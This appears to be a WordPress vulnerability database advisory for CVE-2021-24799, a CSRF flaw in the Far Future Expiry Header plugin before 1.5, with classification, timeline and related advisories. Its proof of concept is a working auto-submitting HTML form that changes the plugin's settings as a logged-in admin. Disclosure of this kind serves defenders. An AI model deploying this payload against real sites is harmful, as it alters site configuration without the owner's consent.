WordPress Plugin Vulnerabilities

Far Future Expiry Header < 1.5 - Plugin's Settings Update via CSRF

Description

The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=ffe_plugin_options" method="post" id="csrf">
<input type="hidden" name="enable-ffe" value="on">
<input type="hidden" name="num-expiry-days" value="1">
<input type="hidden" name="ffe-png" value="on">
<input type="hidden" name="ffe_save_settings" value="1">
</form><script>csrf.submit()</script>

Affects Plugins

Plugin icon
far-future-expiry-header
Fixed in 1.5

References

CVE
CVE-2021-24799

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
6010ce4e-3e46-4cc1-96d8-560b30b605ed

Timeline

Publicly Published
2021-10-04 (about 2 years ago)
Added
2021-10-04 (about 2 years ago)
Last Updated
2022-04-15 (about 2 years ago)

Other

Published
Title
Published
2022-05-30
Title
WPlite <= 1.3.1 - Arbitrary Settings Update via CSRF
Published
2021-09-28
Title
OG Tags < 2.0.2 - Plugin's Settings Update via CSRF
Published
2023-10-16
Title
Caret Country Access Limit < 1.0.3 - Arbitrary Settings Update via CSRF
Published
2022-06-28
Title
WP Meta SEO < 4.4.9 - Social Settings Update via CSRF
Published
2024-03-20
Title
WordPress Ping Optimizer <= 2.35.1.3.0 - Log Clearing via CSRF